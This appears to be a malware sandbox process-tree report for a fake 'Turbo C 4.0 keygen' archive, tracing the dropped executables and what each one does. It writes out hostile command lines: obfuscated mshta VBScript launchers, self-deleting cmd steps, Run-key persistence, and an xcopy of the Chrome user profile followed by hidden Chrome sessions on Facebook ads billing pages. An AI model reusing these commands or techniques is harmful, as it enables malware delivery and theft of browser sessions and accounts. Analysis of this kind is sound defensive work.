                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp2_Turbo.C.4.0.Windows.7.Window.keygen.by.Lz0.zip\Turbo.C.4.0.Windows.7.Window.keygen.by.Lz0.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Temp2_Turbo.C.4.0.Windows.7.Window.keygen.by.Lz0.zip\Turbo.C.4.0.Windows.7.Window.keygen.by.Lz0.exe"
                                                                                                                      1⤵
                                                                                                                        PID:2740
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                          2⤵
                                                                                                                          • Loads dropped DLL
                                                                                                                          PID:2160
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                            keygen-pr.exe -p83fsase3Ge
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            PID:2968
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:1604
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                5⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:2188
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                            keygen-step-1.exe
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:2040
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                                                                                                            keygen-step-5.exe
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:108
                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                              "C:\Windows\System32\mshta.exe" VbscriPt: ClOse ( CReatEobjecT ( "WScriPt.sHeLl" ).RUn ( "CmD.ExE /c copY /y ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" RWD_.exe > NUL && starT RWD_.exe -PQtL97YU9CePvSHWa~W4YULQmeii & iF """" == """" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill /f /IM ""%~nxm"" > nuL " , 0 ))
                                                                                                                              4⤵
                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                              PID:2836
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c copY /y "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" RWD_.exe > NUL && starT RWD_.exe -PQtL97YU9CePvSHWa~W4YULQmeii & iF "" =="" for %m In ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill /f /IM "%~nxm" > nuL
                                                                                                                                5⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                PID:1064
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RWD_.exe
                                                                                                                                  RWD_.exe -PQtL97YU9CePvSHWa~W4YULQmeii
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:1404
                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                    "C:\Windows\System32\mshta.exe" VbscriPt: ClOse ( CReatEobjecT ( "WScriPt.sHeLl" ).RUn ( "CmD.ExE /c copY /y ""C:\Users\Admin\AppData\Local\Temp\RWD_.exe"" RWD_.exe > NUL && starT RWD_.exe -PQtL97YU9CePvSHWa~W4YULQmeii & iF ""-PQtL97YU9CePvSHWa~W4YULQmeii "" == """" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\RWD_.exe"" ) do taskkill /f /IM ""%~nxm"" > nuL " , 0 ))
                                                                                                                                    7⤵
                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                    PID:1076
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /c copY /y "C:\Users\Admin\AppData\Local\Temp\RWD_.exe" RWD_.exe > NUL && starT RWD_.exe -PQtL97YU9CePvSHWa~W4YULQmeii & iF "-PQtL97YU9CePvSHWa~W4YULQmeii " =="" for %m In ( "C:\Users\Admin\AppData\Local\Temp\RWD_.exe" ) do taskkill /f /IM "%~nxm" > nuL
                                                                                                                                      8⤵
                                                                                                                                        PID:2868
                                                                                                                                    • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                      "C:\Windows\System32\regsvr32.exe" .\WiUZzK.CI -s
                                                                                                                                      7⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                      PID:1844
                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                    taskkill /f /IM "keygen-step-5.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    PID:2192
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                              keygen-step-2.exe
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              PID:1080
                                                                                                                              • C:\Users\Admin\AppData\Roaming\8A5F.tmp.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\8A5F.tmp.exe"
                                                                                                                                4⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Loads dropped DLL
                                                                                                                                PID:3028
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\8A5F.tmp.exe"
                                                                                                                                  5⤵
                                                                                                                                    PID:560
                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                      timeout /T 10 /NOBREAK
                                                                                                                                      6⤵
                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                      PID:776
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                  4⤵
                                                                                                                                    PID:588
                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                      ping 127.0.0.1
                                                                                                                                      5⤵
                                                                                                                                      • Runs ping.exe
                                                                                                                                      PID:996
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                  keygen-step-4.exe
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                  PID:284
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\xiuhuali.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\xiuhuali.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:680
                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                                                                                                      5⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Modifies registry class
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:2356
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Modifies system certificate store
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:2736
                                                                                                                                    • C:\ProgramData\1772371.exe
                                                                                                                                      "C:\ProgramData\1772371.exe"
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      PID:2864
                                                                                                                                    • C:\ProgramData\3887168.exe
                                                                                                                                      "C:\ProgramData\3887168.exe"
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Adds Run key to start application
                                                                                                                                      PID:520
                                                                                                                                      • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                        "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:1780
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:2848
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-88L4F.tmp\Install.tmp
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-88L4F.tmp\Install.tmp" /SL5="$40222,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:2872
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-V2PQ8.tmp\Ultra.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-V2PQ8.tmp\Ultra.exe" /S /UID=burnerch1
                                                                                                                                        6⤵
                                                                                                                                        • Drops file in Drivers directory
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Adds Run key to start application
                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                        PID:1856
                                                                                                                                        • C:\Program Files\Windows Portable Devices\MJQELQSUBM\ultramediaburner.exe
                                                                                                                                          "C:\Program Files\Windows Portable Devices\MJQELQSUBM\ultramediaburner.exe" /VERYSILENT
                                                                                                                                          7⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          PID:3008
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-AU0UK.tmp\ultramediaburner.tmp
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-AU0UK.tmp\ultramediaburner.tmp" /SL5="$50206,281924,62464,C:\Program Files\Windows Portable Devices\MJQELQSUBM\ultramediaburner.exe" /VERYSILENT
                                                                                                                                            8⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                            PID:2940
                                                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                              9⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:2884
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1e-2f5eb-4d3-68b8b-297fae5eeffad\Jaqyrupyno.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\1e-2f5eb-4d3-68b8b-297fae5eeffad\Jaqyrupyno.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:2136
                                                                                                                                          • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                            "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                                                                            8⤵
                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:2376
                                                                                                                                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2376 CREDAT:275457 /prefetch:2
                                                                                                                                              9⤵
                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                              PID:2540
                                                                                                                                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2376 CREDAT:799752 /prefetch:2
                                                                                                                                              9⤵
                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                              • NTFS ADS
                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                              PID:1488
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4d-87936-524-41b9a-4e9e9dca92696\Qivyshenodo.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\4d-87936-524-41b9a-4e9e9dca92696\Qivyshenodo.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:832
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3tfwqvwv.5sp\instEU.exe & exit
                                                                                                                                            8⤵
                                                                                                                                              PID:560
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3tfwqvwv.5sp\instEU.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\3tfwqvwv.5sp\instEU.exe
                                                                                                                                                9⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                PID:1580
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sajftze5.ega\gpooe.exe & exit
                                                                                                                                              8⤵
                                                                                                                                                PID:2208
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j3z3oe40.fpr\google-game.exe & exit
                                                                                                                                                8⤵
                                                                                                                                                  PID:2352
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\j3z3oe40.fpr\google-game.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\j3z3oe40.fpr\google-game.exe
                                                                                                                                                    9⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:2120
                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                                                                                                                      10⤵
                                                                                                                                                        PID:2748
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tust0hsp.uca\skipper.exe /s & exit
                                                                                                                                                    8⤵
                                                                                                                                                      PID:2832
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\tust0hsp.uca\skipper.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\tust0hsp.uca\skipper.exe /s
                                                                                                                                                        9⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                        PID:1064
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1480417501.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\1480417501.exe
                                                                                                                                                          10⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          PID:596
                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                            11⤵
                                                                                                                                                              PID:1960
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2001949949.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\2001949949.exe
                                                                                                                                                            10⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:2200
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\tust0hsp.uca\skipper.exe & exit
                                                                                                                                                            10⤵
                                                                                                                                                              PID:3804
                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                ping 0
                                                                                                                                                                11⤵
                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                PID:3820
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\frwctb3w.arq\md1_1eaf.exe & exit
                                                                                                                                                          8⤵
                                                                                                                                                            PID:1272
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\frwctb3w.arq\md1_1eaf.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\frwctb3w.arq\md1_1eaf.exe
                                                                                                                                                              9⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                              PID:2724
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x1xhglfp.zkf\askinstall36.exe & exit
                                                                                                                                                            8⤵
                                                                                                                                                              PID:2860
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\x1xhglfp.zkf\askinstall36.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\x1xhglfp.zkf\askinstall36.exe
                                                                                                                                                                9⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Drops Chrome extension
                                                                                                                                                                • Modifies registry class
                                                                                                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                PID:2748
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                  10⤵
                                                                                                                                                                    PID:784
                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                      taskkill /f /im chrome.exe
                                                                                                                                                                      11⤵
                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                      PID:2432
                                                                                                                                                                  • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                    xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                    10⤵
                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                    PID:4016
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                    10⤵
                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                    PID:3256
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef1584f50,0x7fef1584f60,0x7fef1584f70
                                                                                                                                                                      11⤵
                                                                                                                                                                        PID:2812
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1092,8621913746294061606,4065806278205843176,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1104 /prefetch:2
                                                                                                                                                                        11⤵
                                                                                                                                                                          PID:3284
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1092,8621913746294061606,4065806278205843176,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1608 /prefetch:8
                                                                                                                                                                          11⤵
                                                                                                                                                                            PID:3364
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1092,8621913746294061606,4065806278205843176,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1600 /prefetch:8
                                                                                                                                                                            11⤵
                                                                                                                                                                              PID:3380
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1092,8621913746294061606,4065806278205843176,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1968 /prefetch:1
                                                                                                                                                                              11⤵
                                                                                                                                                                                PID:3460
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1092,8621913746294061606,4065806278205843176,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1956 /prefetch:1
                                                                                                                                                                                11⤵
                                                                                                                                                                                  PID:3472
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1092,8621913746294061606,4065806278205843176,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1992 /prefetch:1
                                                                                                                                                                                  11⤵
                                                                                                                                                                                    PID:3540
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1092,8621913746294061606,4065806278205843176,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1984 /prefetch:1
                                                                                                                                                                                    11⤵
                                                                                                                                                                                      PID:3548
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1092,8621913746294061606,4065806278205843176,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2220 /prefetch:1
                                                                                                                                                                                      11⤵
                                                                                                                                                                                        PID:3576
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1092,8621913746294061606,4065806278205843176,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2704 /prefetch:1
                                                                                                                                                                                        11⤵
                                                                                                                                                                                          PID:3616
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1092,8621913746294061606,4065806278205843176,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1244 /prefetch:2
                                                                                                                                                                                          11⤵
                                                                                                                                                                                            PID:2236
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1092,8621913746294061606,4065806278205843176,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2788 /prefetch:8
                                                                                                                                                                                            11⤵
                                                                                                                                                                                              PID:3904
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1092,8621913746294061606,4065806278205843176,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4540 /prefetch:8
                                                                                                                                                                                              11⤵
                                                                                                                                                                                                PID:3304
                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\svwemjht.mg3\YBYMULFXSX.exe & exit
                                                                                                                                                                                          8⤵
                                                                                                                                                                                            PID:2784
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\svwemjht.mg3\YBYMULFXSX.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\svwemjht.mg3\YBYMULFXSX.exe
                                                                                                                                                                                              9⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                              PID:3900
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
                                                                                                                                                                                                10⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                PID:3964
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                                                                                                                                                  parse.exe -f json -b firefox
                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                  PID:3236
